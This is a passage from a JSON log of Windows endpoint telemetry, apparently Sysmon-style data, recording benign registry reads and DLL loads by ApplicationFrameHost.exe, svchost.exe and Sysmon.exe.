Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "CapabilityAccessManagerClient.dll", - "image_path": "C:\\Windows\\System32\\CapabilityAccessManagerClient.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573251360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573251360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cellulardatacapabilityhandler.dll", - "image_path": "C:\\Windows\\System32\\cellulardatacapabilityhandler.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573251360000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 